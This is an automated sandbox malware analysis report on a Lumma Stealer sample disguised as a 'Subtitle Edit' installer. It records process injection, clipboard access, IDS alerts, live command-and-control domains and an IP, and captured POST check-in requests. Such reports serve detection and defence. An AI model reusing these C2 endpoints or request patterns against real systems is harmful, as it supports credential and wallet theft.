Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0Subtitle Edit.exe

Overview

General Information

Sample name:0Subtitle Edit.exe
Analysis ID:1501216
MD5:c304e6d97f3a59f101484c104132c434
SHA1:02eefa0d5e5578406c37d9088be34c844349df01
SHA256:2380b9a91c92ba2ab097f7237294d9235970ea3054bd16c7b5aabcbec9c44322
Tags:exelummalummarcLummaStealerWingo
Infos:

Detection

LummaC
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
LummaC encrypted strings found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 0Subtitle Edit.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\0Subtitle Edit.exe" MD5: C304E6D97F3A59F101484C104132C434)
    • BitLockerToGo.exe (PID: 3992 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2283833733.0000000002F1E000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
No Sigma rule has matched
Timestamp:2024-08-29T15:40:23.745299+0200
SID:2055493
Severity:1
Source Port:49716
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:23.086805+0200
SID:2055493
Severity:1
Source Port:49715
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:22.581381+0200
SID:2055483
Severity:1
Source Port:49209
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:23.232493+0200
SID:2049836
Severity:1
Source Port:49715
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:23.232493+0200
SID:2054653
Severity:1
Source Port:49715
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:24.347073+0200
SID:2049812
Severity:1
Source Port:49716
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:24.347073+0200
SID:2054653
Severity:1
Source Port:49716
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:22.112500+0200
SID:2055489
Severity:1
Source Port:49714
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:22.563426+0200
SID:2049836
Severity:1
Source Port:49714
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:22.563426+0200
SID:2054653
Severity:1
Source Port:49714
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:21.613730+0200
SID:2055479
Severity:1
Source Port:50099
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:21.491116+0200
SID:2049836
Severity:1
Source Port:49713
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-08-29T15:40:21.491116+0200
SID:2054653
Severity:1
Source Port:49713
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://locatedblsoqp.shop/apiAvira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/Avira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/apiAvira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/0zAvira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/8Avira URL Cloud: Label: malware
Source: https://separateedmsqj.shop/apiAvira URL Cloud: Label: malware
Source: https://locatedblsoqp.shop/WAvira URL Cloud: Label: phishing
Source: https://traineiwnqo.shop/Avira URL Cloud: Label: malware
Source: 0Subtitle Edit.exeReversingLabs: Detection: 34%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: 0Subtitle Edit.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: 0Subtitle Edit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: 0Subtitle Edit.exe, 00000000.00000002.2283833733.0000000002EE4000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: 0Subtitle Edit.exe, 00000000.00000002.2283833733.0000000002EE4000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_00433DD2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov al, 01h2_2_00435E33
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_00435E33
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov al, 01h2_2_00435EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_00435EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov al, 01h2_2_004367B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_004367B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ecx], 625B6034h2_2_00412054
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_00421030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h2_2_00438830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_004110C7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_0040F11C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_0040F11C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx2_2_004071F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00419A40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+20h]2_2_0041DA50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041DA50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h2_2_0040F20D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_00414AF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_00414AF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl2_2_004272F1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_00420A80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]2_2_00437280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]2_2_00438280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [0043FE64h]2_2_0041EA8C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041AA90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx esi, byte ptr [ebp+00h]2_2_00437AA2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push edi2_2_00420333
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_0040EBD3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]2_2_004133F7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx], 77A9E0C4h2_2_00438430
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_004214E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [ebp-7Ch]2_2_0041B4F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_0041049E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp al, 2Eh2_2_0041DCB7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0040AD00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_0042AD20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]2_2_00434650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_00432650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_00413600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]2_2_0041D620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]2_2_00436622
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]2_2_00437690
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ecx], 625B6034h2_2_004127CF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_004197E0

Networking

barindex
Source: Network trafficSuricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.6:50099 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2055493 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2055489 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop) : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.6:49209 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49716 -> 188.114.96.3:443
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: separateedmsqj.shop
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locatedblsoqp.shop
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: traineiwnqo.shop
Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=XRu95sVNoGkSeHaTLKe6ecZVkq6cnlTXtPLV4r8Wmas-1724938823-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 76Host: traineiwnqo.shop
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: separateedmsqj.shop
Source: global trafficDNS traffic detected: DNS query: locatedblsoqp.shop
Source: global trafficDNS traffic detected: DNS query: traineiwnqo.shop
Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: separateedmsqj.shop
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.0
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.1
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://earth.google.com/kml/2.2
Source: 0Subtitle Edit.exeString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.00000000028F4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml/3.2
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/gml/3.3/exr
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.opengis.net/kml/2.2
Source: 0Subtitle Edit.exe, 00000000.00000002.2282605862.0000000002886000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.topografix.com/GPX/1/1
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/0z
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/W
Source: BitLockerToGo.exe, 00000002.00000003.2301570044.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://locatedblsoqp.shop/api
Source: 0Subtitle Edit.exeString found in binary or memory: https://login.microsoftonline.us/crypto/aes:
Source: BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://separateedmsqj.shop/api
Source: BitLockerToGo.exe, 00000002.00000002.2319746932.000000000285E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://separateedmsqj.shop/x86
Source: BitLockerToGo.exe, 00000002.00000002.2319746932.0000000002883000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/
Source: BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/8
Source: BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/api
Source: BitLockerToGo.exe, 00000002.00000003.2308315335.000000000287F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2319746932.000000000285E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308293210.00000000028D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000002.00000003.2308315335.000000000287F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308293210.00000000028D8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2308315335.0000000002883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/ddos/glossary/malware/
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042AAD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042AAD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042AAD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_0042AAD0

System Summary

barindex
Source: 00000000.00000002.2283833733.0000000002F1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040C9262_2_0040C926
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00435EF82_2_00435EF8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041F8402_2_0041F840
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004078702_2_00407870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040F02D2_2_0040F02D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004210302_2_00421030
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0042F9402_2_0042F940
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004371302_2_00437130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004041D02_2_004041D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004059E02_2_004059E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004071F02_2_004071F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041DA502_2_0041DA50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00425A692_2_00425A69
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040F20D2_2_0040F20D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00402A202_2_00402A20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00436AED2_2_00436AED
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00414AF02_2_00414AF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004372802_2_00437280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040D2862_2_0040D286
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041AA902_2_0041AA90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00437AA22_2_00437AA2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004263432_2_00426343
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00430BD02_2_00430BD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00438C402_2_00438C40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00426C282_2_00426C28
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004304D02_2_004304D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041B4F62_2_0041B4F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004064A02_2_004064A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041DCB72_2_0041DCB7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041CD592_2_0041CD59
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004045702_2_00404570
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041F5DB2_2_0041F5DB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004375902_2_00437590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004245A02_2_004245A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040DDAC2_2_0040DDAC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0040D6202_2_0040D620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041D6202_2_0041D620
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00401E3A2_2_00401E3A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00401EE52_2_00401EE5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0041EEFB2_2_0041EEFB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_004376902_2_00437690
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00413EA72_2_00413EA7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00408F702_2_00408F70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00438F302_2_00438F30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00404FD02_2_00404FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_00419FFF2_2_00419FFF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00409A30 appears 49 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00417E90 appears 136 times
Source: 0Subtitle Edit.exe, 00000000.00000002.2281871181.0000000001BBD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs 0Subtitle Edit.exe
